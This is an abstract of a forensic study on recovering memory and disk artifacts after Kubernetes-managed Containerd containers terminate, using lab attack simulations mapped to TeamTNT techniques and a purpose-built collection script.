A Forensic Study of Artifact Persistence in Containerd-Based Kubernetes Workloads

A container is a standard unit of software that packages code, including its dependencies, so the application runs quickly and reliably across computing environments. Organizations have increasingly adopted containerization due to its optimization, flexibility, and applications. However, when implemented at scale, an orchestrator is required to manage a large number of containers.

Kubernetes, for example, can run multiple containers simultaneously and can be torn down immediately. However, this poses a challenge for cybersecurity incident responders, as forensic artifacts are affected, thereby impacting the analysis. This leads to the research question: What forensic artifacts can be recovered from memory and disk after a Kubernetes-managed Containerd container terminates on a Linux system, and how do container runtime behaviors affect their persistence and accessibility?

To answer the research question, seven container termination methods have been grouped into five categories for testing in a lab environment. In addition, the attacks simulated to identify artifact persistence were mapped to Team TNT (Tactics, Techniques, and Procedures) TTPs. Artifacts generated by the attack simulation were forensically acquired using a structured method: a tool, "k8fc.sh", was developed for logical collection; two memory images were acquired for each test; and a disk string search was performed.